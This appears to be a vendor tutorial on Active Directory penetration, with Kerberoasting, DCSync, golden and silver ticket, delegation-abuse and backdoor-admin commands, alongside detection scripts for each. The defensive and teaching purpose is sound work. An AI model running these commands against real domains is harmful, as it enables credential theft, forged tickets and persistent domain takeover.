Domain penetration focuses on compromising Active Directory environments, which are the backbone of enterprise Windows networks. This guide covers advanced techniques for enumerating, attacking, and maintaining persistence in AD domains.
Active Directory Overview
Active Directory is Microsoft's directory service for Windows domain networks. It stores information about objects on the network and makes this information available to users and administrators. Compromising AD often means gaining control of the entire enterprise network.
AD Enumeration
```
# Domain information
nltest /dclist:domain.local
Get-ADDomain
Get-ADForest
# User enumeration
net user /domain
Get-ADUser -Filter * -Properties *
# Group enumeration
net group /domain
net group "Domain Admins" /domain
Get-ADGroup -Filter * -Properties *
# Computer enumeration
Get-ADComputer -Filter * -Properties *
# Bloodhound collection
bloodhound-python -d domain.local -u user -p password -ns 10.0.0.1 -c all
SharpHound.exe -c all
```
Kerberoasting
```
# Request service tickets for accounts with SPNs
GetUserSPNs.py -request -dc-ip 10.0.0.1 domain.local/user:password
# PowerShell
Invoke-Kerberoast -OutputFormat Hashcat | fl
# Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt
# Crack the hash
hashcat -m 13100 hashes.txt wordlist.txt
```
AS-REP Roasting
```
# Find users with "Do not require Kerberos preauthentication"
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
# Request AS-REP hashes
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
```
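Both roasting techniques above leave a distinctive trace on the domain controller: Kerberoasting shows up as a burst of service-ticket requests (event 4769) with RC4 encryption for several service accounts from one requester, and AS-REP roasting as a TGT being issued (event 4768) with PreAuthType 0. The following detection logic is an added example written for this page, not code from the guide or from HackHub; it assumes the events have been exported as dictionaries with their standard field names, and the sample events are constructed.

```python
"""Detect Kerberoasting and AS-REP roasting in Domain Controller Security logs.

Added example (not part of the original guide). Assumes events 4769 and 4768 are
exported as dictionaries with their standard field names; the events below are
constructed sample data, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                         # TicketEncryptionType requested by roasting tools by default
KERBEROAST_WINDOW = timedelta(minutes=5)
KERBEROAST_MIN_SERVICES = 3               # distinct service accounts per requester per window

EVENTS = [  # constructed
    # Burst of RC4 service-ticket requests from one client: Kerberoasting pattern.
    {"EventID": 4769, "Time": "2024-05-01T09:00:01", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:02", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:02", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:03", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    # Ordinary AES service ticket: not flagged.
    {"EventID": 4769, "Time": "2024-05-01T09:01:00", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.77"},
    # TGT issued without pre-authentication: an AS-REP roastable account being harvested.
    {"EventID": 4768, "Time": "2024-05-01T09:02:00", "TargetUserName": "legacyapp",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    # Normal AS exchange: first request is refused with KDC_ERR_PREAUTH_REQUIRED (0x19), then succeeds.
    {"EventID": 4768, "Time": "2024-05-01T09:02:01", "TargetUserName": "carol",
     "PreAuthType": "0", "TicketEncryptionType": "0xffffffff", "Status": "0x19", "IpAddress": "10.0.0.90"},
    {"EventID": 4768, "Time": "2024-05-01T09:02:01", "TargetUserName": "carol",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.90"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def kerberoast_candidates(events):
    """Map requester -> sorted service accounts for requesters that obtained RC4 tickets
    for at least KERBEROAST_MIN_SERVICES distinct service accounts inside one window."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0" or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the KDC have random passwords: not a roasting target
        per_user[e["TargetUserName"]].append((_ts(e), svc))
    hits = {}
    for user, requests in per_user.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= KERBEROAST_WINDOW}
            if len(in_window) >= KERBEROAST_MIN_SERVICES:
                hits[user] = sorted(in_window)
                break
    return hits


def asrep_roast_candidates(events):
    """Accounts for which the KDC issued a TGT with no pre-authentication (PreAuthType 0).
    Failed requests (Status 0x19) are the normal first leg of an AS exchange and are ignored."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0" and e["Status"] == "0x0"})


def analyze(events):
    return {"kerberoast": kerberoast_candidates(events), "asrep_roast": asrep_roast_candidates(events)}


if __name__ == "__main__":
    print(analyze(EVENTS))
```

The Status check matters in practice: every normal AS exchange begins with a PreAuthType 0 request that the KDC rejects with 0x19, so alerting on PreAuthType 0 alone is pure noise. Likewise, 4769 is high volume, so the threshold and window should be tuned per domain, and accounts that legitimately touch many services (monitoring, backup) go on an allowlist.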
DCSync Attack
```
# Requires Replicating Directory Changes permissions
# Mimikatz
lsadump::dcsync /user:domain\krbtgt
lsadump::dcsync /user:domain\Administrator
# Impacket
secretsdump.py domain/admin:[email protected] -just-dc
secretsdump.py domain/[email protected] -hashes :ntlmhash -just-dc-user krbtgt
```
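The "Replicating Directory Changes" permissions the section opens with are extended rights on the domain object, and exercising them is audited as event 4662 with the corresponding rights GUIDs in its Properties field. The following rule is an added example written for this page (not the guide's or HackHub's code); it assumes "Audit Directory Service Access" is enabled on the domain head and that 4662 events are exported as dictionaries with their standard field names. The replicator allowlist and sample events are constructed.

```python
"""Flag DCSync-style replication requests in Domain Controller Security logs.

Added example (not part of the original guide). Assumes event 4662 ("An operation
was performed on an object") is exported as a dictionary with its standard field
names. Sample events and account names are constructed.
"""
import re

# Extended-rights GUIDs behind the "Replicating Directory Changes" permissions.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of the domainDNS class
CONTROL_ACCESS = "0x100"                                    # AccessMask for extended (control) rights

# Principals that replicate legitimately: DC machine accounts and the directory
# sync account. Constructed names; in practice an environment-specific allowlist.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3d4e5f6"}

SAMPLE_4662 = [  # constructed
    # A domain controller replicating: expected.
    {"EventID": 4662, "Time": "2024-05-01T10:00:00", "SubjectUserName": "DC02$",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling replication data: the DCSync pattern.
    {"EventID": 4662, "Time": "2024-05-01T10:03:12", "SubjectUserName": "jdoe",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Some other control-access right on the domain head (constructed GUID): not replication.
    {"EventID": 4662, "Time": "2024-05-01T10:05:00", "SubjectUserName": "svc_backup",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{00000000-1111-2222-3333-444444444444}"},
    # Write access on an unrelated object (constructed GUIDs): ignored.
    {"EventID": 4662, "Time": "2024-05-01T10:06:00", "SubjectUserName": "jdoe",
     "ObjectType": "%{00000000-aaaa-bbbb-cccc-dddddddddddd}", "AccessMask": "0x20",
     "Properties": "Write Property\n\t{00000000-eeee-ffff-0000-111111111111}"},
]

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")


def guids_in(text):
    """Lower-case GUIDs found in a multi-line 4662 Properties field."""
    return set(GUID_RE.findall(text.lower()))


def dcsync_alerts(events):
    """One alert per 4662 that exercises a replication right on the domain object
    from a principal outside EXPECTED_REPLICATORS."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != CONTROL_ACCESS:
            continue
        if e["ObjectType"].strip("%{}").lower() != DOMAIN_DNS_CLASS:
            continue
        rights = guids_in(e["Properties"]) & set(REPLICATION_RIGHTS)
        if not rights or e["SubjectUserName"] in EXPECTED_REPLICATORS:
            continue
        alerts.append({"time": e["Time"], "subject": e["SubjectUserName"],
                       "rights": sorted(REPLICATION_RIGHTS[g] for g in rights)})
    return alerts


if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_4662):
        print(alert)
```

The allowlist is the weak point of this rule: an attacker who compromises a sync account or a DC machine account replicates "legitimately". Pair it with a periodic review of who actually holds the three rights on the domain object, so the allowlist and the ACL are kept in agreement.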
Golden Ticket Attack
```
# Get domain SID and krbtgt hash via DCSync
# Create golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /id:500
# Inject ticket
kerberos::ptt ticket.kirbi
# Verify access
dir \\dc.domain.local\c$
# Impacket
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/[email protected]
```
Silver Ticket Attack
```
# Create ticket for specific service
# Need service account NTLM hash
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:service_hash /id:500
# Inject and use
kerberos::ptt ticket.kirbi
dir \\server.domain.local\share
```
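Forged tickets are hard to spot from a single event, but both of the ticket attacks above break the normal Kerberos sequence: a golden ticket is a TGT the DC never issued, so service-ticket requests (4769) appear for a user and client with no preceding TGT issue or renewal (4768/4770); a silver ticket never touches the DC at all, so the target server records a Kerberos network logon (4624) for which no 4769 exists. The correlation below is an added example written for this page (not the guide's or HackHub's code). It assumes DC events and the member server's events are available as two dictionary feeds; the names, addresses and times are constructed, and the lifetimes are the Windows defaults.

```python
"""Surface forged Kerberos tickets by correlating DC and member-server logons.

Added example (not part of the original guide). Assumes two constructed feeds:
DC Security events 4768 (TGT issued), 4770 (TGT renewed) and 4769 (service ticket
issued), and member-server event 4624 (logon). Names, addresses and times are
constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)              # default "Maximum lifetime for user ticket"
SERVICE_TICKET_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for service ticket" (600 min)

DC_EVENTS = [  # constructed
    {"EventID": 4768, "Time": "2024-05-01T08:00:00", "TargetUserName": "alice", "IpAddress": "10.0.0.55", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T08:05:00", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "FILESRV01$", "IpAddress": "10.0.0.55", "Status": "0x0"},
    # bob's TGT is from yesterday but was renewed (4770) this morning: legitimate.
    {"EventID": 4768, "Time": "2024-04-30T19:00:00", "TargetUserName": "bob", "IpAddress": "10.0.0.77", "Status": "0x0"},
    {"EventID": 4770, "Time": "2024-05-01T07:30:00", "TargetUserName": "bob@DOMAIN.LOCAL", "IpAddress": "10.0.0.77", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T08:30:00", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "FILESRV01$", "IpAddress": "10.0.0.77", "Status": "0x0"},
    # Service ticket request from a client that never obtained a TGT: golden ticket pattern.
    {"EventID": 4769, "Time": "2024-05-01T09:00:00", "TargetUserName": "Administrator@DOMAIN.LOCAL",
     "ServiceName": "DC01$", "IpAddress": "10.0.0.99", "Status": "0x0"},
]

FILESRV01_EVENTS = [  # constructed, from the member server's own Security log
    {"EventID": 4624, "Time": "2024-05-01T08:05:01", "TargetUserName": "alice", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.55"},
    # Kerberos logon although the DC never issued a ticket for this host: silver ticket pattern.
    {"EventID": 4624, "Time": "2024-05-01T09:30:00", "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.99"},
    # NTLM logon: out of scope for this rule.
    {"EventID": 4624, "Time": "2024-05-01T09:40:00", "TargetUserName": "carol", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.90"},
]


def _user(name):
    """Normalise 'user@REALM' and 'user' to one key."""
    return name.split("@")[0].lower()


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def _recent(times, at, lifetime):
    return any(timedelta(0) <= at - t <= lifetime for t in times)


def golden_ticket_suspects(dc_events):
    """4769 requests from a (user, client) pair with no 4768/4770 inside TGT_LIFETIME."""
    tgt_times = defaultdict(list)   # (user, client ip) -> TGT issue/renew times
    for e in dc_events:
        if e["EventID"] in (4768, 4770) and e["Status"] == "0x0":
            tgt_times[(_user(e["TargetUserName"]), e["IpAddress"])].append(_ts(e))
    suspects = []
    for e in dc_events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        key = (_user(e["TargetUserName"]), e["IpAddress"])
        if not _recent(tgt_times[key], _ts(e), TGT_LIFETIME):
            suspects.append({"user": key[0], "client": key[1], "service": e["ServiceName"], "time": e["Time"]})
    return suspects


def silver_ticket_suspects(dc_events, host_events, host_name):
    """Kerberos network logons on host_name with no DC-issued ticket for that host."""
    host_account = host_name.split(".")[0].upper() + "$"   # CIFS/HOST tickets are issued to the computer account
    issued = defaultdict(list)                              # user -> times the DC issued a ticket for this host
    for e in dc_events:
        if e["EventID"] == 4769 and e["Status"] == "0x0" and e["ServiceName"].upper() == host_account:
            issued[_user(e["TargetUserName"])].append(_ts(e))
    suspects = []
    for e in host_events:
        if e["EventID"] != 4624 or e["LogonType"] != "3" or e["AuthenticationPackageName"] != "Kerberos":
            continue
        user = _user(e["TargetUserName"])
        if not _recent(issued[user], _ts(e), SERVICE_TICKET_LIFETIME):
            suspects.append({"user": user, "host": host_name, "client": e["IpAddress"], "time": e["Time"]})
    return suspects


if __name__ == "__main__":
    print(golden_ticket_suspects(DC_EVENTS))
    print(silver_ticket_suspects(DC_EVENTS, FILESRV01_EVENTS, "filesrv01.domain.local"))
```

Two operational caveats: clients obtain TGTs and service tickets from whichever DC answers, so the DC feed must be the merged logs of every DC in the domain, and the lifetimes must match the domain's Kerberos policy or renewals will be misread as forgeries.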
Bloodhound Analysis
```
# Collect data
bloodhound-python -d domain.local -u user -p pass -ns 10.0.0.1 -c all
# Import to Bloodhound
# Start Neo4j database
neo4j console
# Run Bloodhound GUI
# Import JSON files
# Useful queries:
# - Find all Domain Admins
# - Shortest paths to Domain Admins
# - Find computers where Domain Users can RDP
# - Find AS-REP Roastable users
# - Find Kerberoastable users
```
Constrained Delegation
```
# Find accounts with constrained delegation (attribute is set)
Get-ADUser -Filter {msDS-AllowedToDelegateTo -like "*"} -Properties msDS-AllowedToDelegateTo
# Exploit with Rubeus
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
# Access target
dir \\target.domain.local\c$
```
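The delegation, pre-authentication and service-account settings that the preceding sections exploit are all visible in a handful of account attributes, so the same conditions can be audited from the defender's side. The script below is an added example written for this page (not the guide's or HackHub's code); it assumes account attributes have been exported from the directory (for instance with Get-ADUser and Get-ADComputer using -Properties *) into dictionaries keyed by LDAP attribute name. The accounts and the one-year service-account password age limit are constructed choices.

```python
"""Audit AD accounts for the delegation and Kerberos weaknesses described above.

Added example (not part of the original guide). Assumes account attributes were
exported into dictionaries keyed by LDAP attribute name. The accounts below are
constructed sample data.
"""
from datetime import datetime, timedelta

# userAccountControl flag bits (Microsoft-documented values)
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

AES_ENC_TYPES = 0x8 | 0x10                  # msDS-SupportedEncryptionTypes: AES128 | AES256
MAX_SPN_PASSWORD_AGE = timedelta(days=365)  # constructed policy threshold
NOW = datetime(2024, 5, 1)                  # fixed "now" so the sample audit is reproducible

ACCOUNTS = [  # constructed
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"], "pwdLastSet": datetime(2021, 3, 1)},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,
     "servicePrincipalName": ["HTTP/web01.domain.local"], "pwdLastSet": datetime(2024, 4, 1),
     "msDS-SupportedEncryptionTypes": 0x18, "msDS-AllowedToDelegateTo": ["cifs/target.domain.local"]},
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x400200, "pwdLastSet": datetime(2024, 1, 10)},
    {"sAMAccountName": "APPSRV01$", "userAccountControl": 0x81000,
     "servicePrincipalName": ["HOST/appsrv01.domain.local"], "pwdLastSet": datetime(2024, 4, 20)},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,
     "servicePrincipalName": ["HOST/dc01.domain.local"], "pwdLastSet": datetime(2024, 4, 20)},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "adminCount": 1,
     "pwdLastSet": datetime(2024, 2, 1)},
    {"sAMAccountName": "alice", "userAccountControl": 0x200, "pwdLastSet": datetime(2024, 3, 1)},
]


def audit_account(acct, now=NOW):
    """Return the list of findings for one account (empty list = nothing to report)."""
    uac = acct.get("userAccountControl", 0)
    findings = []
    # Unconstrained delegation is normal for DCs but a credential-theft risk anywhere else.
    if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
        findings.append("unconstrained-delegation")
    if acct.get("msDS-AllowedToDelegateTo"):
        # With protocol transition the account can obtain tickets for users who never
        # authenticated to it, which is what the S4U step above relies on.
        findings.append("constrained-delegation-protocol-transition"
                        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained-delegation")
    if uac & DONT_REQ_PREAUTH:
        findings.append("preauth-disabled")
    # Service accounts (SPN on a non-machine account) are Kerberoasting targets.
    if acct.get("servicePrincipalName") and not acct["sAMAccountName"].endswith("$"):
        if now - acct["pwdLastSet"] > MAX_SPN_PASSWORD_AGE:
            findings.append("spn-stale-password")
        if not acct.get("msDS-SupportedEncryptionTypes", 0) & AES_ENC_TYPES:
            findings.append("spn-no-aes-configured")   # RC4 tickets crack far faster than AES
    # Protected accounts should be marked sensitive so delegation cannot impersonate them.
    if acct.get("adminCount") == 1 and not uac & NOT_DELEGATED:
        findings.append("privileged-not-marked-sensitive")
    return findings


def audit(accounts, now=NOW):
    """Map sAMAccountName -> findings for every account with at least one finding."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct, now)
        if findings:
            report[acct["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(ACCOUNTS).items():
        print(f"{name}: {', '.join(findings)}")
```

Each finding maps to a fix from the Defense Recommendations section: move service accounts to long random passwords (or gMSAs), set AES encryption types, re-enable pre-authentication, replace unconstrained with constrained delegation, and mark privileged accounts as sensitive or put them in Protected Users.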
Persistence
```
# Golden Ticket (long-term persistence)
# Create ticket with 10-year validity
# Create domain admin account
net user backdoor P@ssw0rd /add /domain
net group "Domain Admins" backdoor /add /domain
# AdminSDHolder
# Add user to AdminSDHolder ACL for persistent admin rights
# DCShadow (pushes changes through replication, so the receiving DC records no
# object-modification audit events for them)
# Requires DA privileges
lsadump::dcshadow /object:target /attribute:primaryGroupID /value:512
```
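The account-based persistence above is loud in the Security log: creating the account raises 4720, adding it to Domain Admins raises 4728 (4732 for the built-in Administrators group), and any edit of the AdminSDHolder ACL raises 5136 once object-level auditing is enabled on that container. The rule below is an added example written for this page (not the guide's or HackHub's code); it assumes those events are exported as dictionaries with their standard field names. Groups are matched by well-known RID so that a renamed Domain Admins group is still caught; the domain SID, names and times are constructed placeholders. It does not cover DCShadow, whose changes arrive by replication and need different telemetry (such as unexpected DC registrations).

```python
"""Detect the account and AdminSDHolder persistence patterns above in DC Security logs.

Added example (not part of the original guide). Assumes these events are exported as
dictionaries with their standard field names:
  4720  A user account was created
  4728  A member was added to a security-enabled global group
  4732  A member was added to a security-enabled local group
  5136  A directory service object was modified
The domain SID, names and times are constructed.
"""
from datetime import datetime, timedelta

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed placeholder
PRIVILEGED_GROUPS = {
    DOMAIN_SID + "-512": "Domain Admins",
    DOMAIN_SID + "-518": "Schema Admins",
    DOMAIN_SID + "-519": "Enterprise Admins",
    "S-1-5-32-544": "Administrators",
}
ADMINSDHOLDER_DN = "cn=adminsdholder,cn=system,dc=domain,dc=local"
CREATE_THEN_ELEVATE = timedelta(hours=1)   # new account made privileged this fast = backdoor pattern

EVENTS = [  # constructed
    {"EventID": 4720, "Time": "2024-05-01T10:00:00", "SubjectUserName": "jdoe",
     "TargetUserName": "backdoor", "TargetSid": DOMAIN_SID + "-1105"},
    {"EventID": 4728, "Time": "2024-05-01T10:00:30", "SubjectUserName": "jdoe",
     "MemberName": "CN=backdoor,CN=Users,DC=domain,DC=local", "MemberSid": DOMAIN_SID + "-1105",
     "TargetUserName": "Domain Admins", "TargetSid": DOMAIN_SID + "-512"},
    # Addition to an unprivileged group: ignored.
    {"EventID": 4728, "Time": "2024-05-01T11:00:00", "SubjectUserName": "helpdesk1",
     "MemberName": "CN=alice,CN=Users,DC=domain,DC=local", "MemberSid": DOMAIN_SID + "-1200",
     "TargetUserName": "Domain Users", "TargetSid": DOMAIN_SID + "-513"},
    {"EventID": 5136, "Time": "2024-05-01T12:00:00", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=AdminSDHolder,CN=System,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"EventID": 4732, "Time": "2024-05-01T12:30:00", "SubjectUserName": "jdoe",
     "MemberName": "CN=svc_backup,CN=Users,DC=domain,DC=local", "MemberSid": DOMAIN_SID + "-1300",
     "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def persistence_alerts(events):
    """Return alerts in time order: privileged-group additions (upgraded to
    'new-account-elevated' when the member was created shortly before) and any
    modification of the AdminSDHolder object."""
    alerts = []
    created_at = {}   # member SID -> creation time, from 4720
    for e in sorted(events, key=_ts):
        eid = e["EventID"]
        if eid == 4720:
            created_at[e["TargetSid"]] = _ts(e)
        elif eid in (4728, 4732) and e["TargetSid"] in PRIVILEGED_GROUPS:
            alert = {"type": "privileged-group-add", "group": PRIVILEGED_GROUPS[e["TargetSid"]],
                     "member": e["MemberName"], "by": e["SubjectUserName"], "time": e["Time"]}
            born = created_at.get(e["MemberSid"])
            if born is not None and _ts(e) - born <= CREATE_THEN_ELEVATE:
                alert["type"] = "new-account-elevated"
            alerts.append(alert)
        elif eid == 5136 and e["ObjectDN"].lower() == ADMINSDHOLDER_DN:
            alerts.append({"type": "adminsdholder-modified", "attribute": e["AttributeLDAPDisplayName"],
                           "by": e["SubjectUserName"], "time": e["Time"]})
    return alerts


if __name__ == "__main__":
    for alert in persistence_alerts(EVENTS):
        print(alert)
```

Correlating on MemberSid rather than on the account name is deliberate: the SID survives renames, so an attacker who creates an account under one name and renames it before elevation is still linked to the creation event.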
Authorization Required
Domain penetration testing must only be performed with explicit written authorization. Unauthorized access to Active Directory is illegal and can cause severe disruption to business operations.
HackHub Professional Services
Expert Active Directory Security Assessment
The HackHub team specializes in comprehensive Active Directory security assessments with over 10 years of experience. We identify misconfigurations, weak permissions, and attack paths that could lead to domain compromise.
Our AD Services:
- Active Directory Security Review
- Kerberos Attack Simulation
- Bloodhound-based Path Analysis
- AD Hardening Consultation
Contact [email protected] for professional AD security services.
Defense Recommendations
- Least Privilege: Limit Domain Admin usage
- Strong Passwords: Long, complex passwords for service accounts
- Disable NTLM: Use Kerberos only where possible
- Protected Users Group: Add privileged accounts
- Monitor Kerberos: Detect unusual ticket requests
- Regular Audits: Review permissions and delegations
- Credential Guard: Enable on Windows 10/Server 2016+
Conclusion
Active Directory penetration is a critical component of enterprise security testing. Understanding these attack techniques helps organizations identify and remediate vulnerabilities before attackers exploit them. Regular AD security assessments and proper configuration are essential for protecting modern Windows networks.